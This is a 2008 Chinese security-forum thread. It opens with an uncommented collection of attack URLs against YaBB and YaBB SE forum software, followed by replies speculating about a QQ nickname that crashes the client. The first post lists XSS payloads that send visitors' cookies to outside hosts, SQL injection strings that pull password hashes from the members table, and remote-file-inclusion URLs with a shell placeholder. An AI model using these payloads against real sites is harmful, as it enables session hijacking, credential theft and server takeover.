Board logo

标题: [讨论]YaBB Hack [打印本页]

作者: wlfjck    时间: 2008-7-22 09:47     标题: [讨论]YaBB Hack


[讨论]YaBB Hack
YaBB 1 Gold
Quote:http://strona.com/cgi-bin/YaBB/Y ... on=display&num=<script>al ert()</script>

Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

YaBB 1.2
Quote:http://strona.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=[shell]

YaBB 1.3.2
Quote:http://[cel]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2
混世魔王 YABBHACK收集
YaBB 1.4.0-1.4.1
Quote:http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=12 0&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackerstrona.exampl ... 2%2Bdocument.cookie)</script>

Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>

Quote:http://www.myserver.com/yabbse/Reminder.php?
searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]

YaBB SE 1.5.1
Quote:[glow=red);background:url(javascript:alert(document .cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(docume nt.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

YaBB SE 1.5.5c
Quote:http://[host]/index.php?board=&action=viewprofile&user=[sql]

YaBB SE 1.5.4, 1.5.5
Quote:http://localhost:8080/yabbse//inde
x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ull,null,null+FROM+yabbse_members+where+ID_ME

YaBB SE 1.5.4, 1.5.3
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+
lmr.ID_MEN+SELECT+ID_MEMBER,+
memberName,null,passwd,null,passwd,null,null,null, null,null,null+
FROM+yabbse_members+/*

Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*

Quote:http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEM BER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(S UBSTRING(realName,1,1)+)+

YaBB 2
Quote:[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://strona.pl/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]

YaBB SE
Quote:http://strona/forum/index.php?board='

Quote:http://strona/forum/index.php?board=1;action=display;threadid='

Quote:http://strona/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>

Quote:http://strona/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>


and shell :puah[1]:

Quote:http://[cel]/yabbse/Sources/Packages.php?sourcedir=[shell]
作者: 车BB    时间: 2008-7-22 09:47

占大哥宝地发个问题
今天看到一QQ ,说如果加上他就删除不掉,至少删除的时候会卡死,我试着加了一下,果真卡死了, QQ 599234321 ,加上之后在点删除,QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下,貌似问题是在他的QQ呢称上面,“? ???发表帖子? `6钻会员?绥?????钾矑粼矒? ”貌似是行代码,但不知道怎么写上去了,在删除他的时候,提示确认窗口的删除按钮除法这个代码,然后QQ崩溃,提示重新启动 。。。。
为了确认。改了下他的备注呢称,问题解决。怎么删都没了问题,至此,确实是呢称问题。

求各位大牛看下是什么原理,给俺菜菜们科普下1 不胜感激。。fuck you
帖子8 精华0 积分15 阅读权限40 在线时间12 小时 注册时间2007-4-3 最后登录2008-6-19 查看详细资料引用 报告 回复 TOP 赚更多的钱

zerosoul
晶莹剔透§烈日灼然
作者: 非法操作    时间: 2008-7-22 09:47

引用:
原帖由 wangyan111 于 2008-6-13 06:37 发表
今天看到一QQ ,说如果加上他就删除不掉,至少删除的时候会卡死,我试着加了一下,果真卡死了, QQ 599234321 ,加上之后在点删除,QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下,貌似问题是在他的QQ呢称上面,“? ???发表帖子? ...
把此人的昵称复制下来,放到winhex里面,发现有如下hex码:
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节,却占很大位置,不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的,挺有意思的,呵呵.

帖子30 精华0 积分58 阅读权限40 性别男 在线时间29 小时 注册时间2007-12-13 最后登录2008-7-10 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

eemi
晶莹剔透§烈日灼然
作者: ming312    时间: 2008-7-22 09:47

用非官方QQ登录删除,miranda IM

帖子33 精华0 积分56 阅读权限40 在线时间136 小时 注册时间2005-7-4 最后登录2008-6-18 查看详细资料引用 报告 回复 TOP

wangyan111
晶莹剔透§烈日灼然
作者: 纯银    时间: 2008-7-22 09:47

引用:
原帖由 zerosoul 于 2008-6-13 07:01 发表

把此人的昵称复制下来,放到winhex里面,发现有如下hex码:
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节,却占很大位置,不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的,挺有意思的 ...
代码是看出来了,,问题是他怎么放进QQ呢称里的,,貌似放不进去那么长的代码。
,,,,
继续关注中,哪位牛大大来给俺科普下。。。。fuck you
帖子8 精华0 积分15 阅读权限40 在线时间12 小时 注册时间2007-4-3 最后登录2008-6-19 查看详细资料引用 报告 回复 TOP 软件项目外包

混世魔王
荣誉会员

作者: jilang    时间: 2008-7-22 09:48

用lumaQQ 看看.取保候审中........

帖子181 精华10 积分3720 阅读权限100 性别男 在线时间88 小时 注册时间2005-3-12 最后登录2008-6-19 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

赵子岩
惟一

晶莹剔透§烈日灼然
作者: vincentyip    时间: 2008-7-22 09:48

我也遇到相同问题。!
将是QQ的最新漏洞么?
加QQ33618096,然后把它拉入黑名单,不一会QQ就卡死掉线。

================================
昨晚跟一朋友闲聊着,给我一个QQ让我加他再把他拉入黑名单,我在傻笑,不是无聊你?

我说我昨天也拉过几个QQ进黑名单呢,说这个QQ不同,一拉就卡死掉线了...

有点好奇,加了直接拉他为黑名单还真掉线的了........我还以我朋友在玩了..看了看下

那人的QQ,如图所示:
他的昵称总就是     anxsoft版主?有留下。塃矑蔫矒?

如果从QQ资料下手的话,那就是这个昵称起到的作用。
如果他的昵称长度大大超出了QQ昵称所规定的长度...

.........................这将会是QQ的最新漏洞么?

他的原理又是怎样的呢..............?
附件
884f7846fc7d65186b63e59d.jpg (5.63 KB)
2008-6-28 15:37

bc46a762d4003ecce7113aa8.jpg (113.58 KB)
2008-6-28 15:37

帖子110 精华2 积分291 阅读权限40 在线时间62 小时 注册时间2006-10-22 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

slyar
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2